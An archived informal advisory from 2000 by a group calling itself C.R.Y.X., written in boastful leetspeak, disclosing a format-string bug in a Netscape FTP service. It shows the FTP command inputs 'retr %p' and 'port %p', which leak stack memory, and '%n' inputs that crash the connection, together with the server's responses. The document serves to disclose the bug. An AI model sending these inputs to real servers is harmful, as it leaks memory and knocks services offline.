Lucene search

HistoryJul 21, 2000 - 12:00 a.m.

CRYX present: netscape profesional services ftp service


Yeah, yeah, it is gonna be first C.R.Y.X. advisory, blah!:-)

we reporting it to you, people, because th1z vulnerability seems to fly
around for some time, so it'z probably better to warn someone, b'koz
we aren't lame scr1ptz-kiddiez expl0iting everone around with their
0day-stolen script! <actually this bug is not find by me, but 2 many ppl
here know it already and none reported it!>

so what we have? yeppa, those d00dz fixed it last bug with directoris and
think itz safe??? HAHAHAHAHAHโ€ฆ every version is still buggy as hell, and
nothing will change it! plenty of bugs, and here is 1 of them:

retr %p %p %p %p %p %p %p %p %p %p
550-Type of object is "unknown/unknown". Transfer MODE is BINARY.
550 open(4b7b1 0 efffeb31 0 53796e74 61782123 72726f12 20674372
6128d432 509e5123): can't open file

retr %n
Connection closed by foreign host.

Buhahahah! You think that's all? Naaaaah!

port %p,%p,%p,%p,%p,%p,%p,%p,%p,%p
501 Syntax error during PORT 4b7b1,0,efffeb31,0,53796e74,61782123,

port %n
Connection closed by foreign host.

And you think that's all? Naaah! I d0n't care.
gr33tings to all our friendz - you know who y0u are!
special gr33tings to d00d that find this bug!

C.R.Y.X. is:

l33thax0r = me :-)
grishm4n = he is really c00l!
m4dman__ = c/c++ codah!
โ€ฆwant join us? mail!

sorry for bad english & have a good d4y!
signed: l33thax0r of C.R.Y.X.

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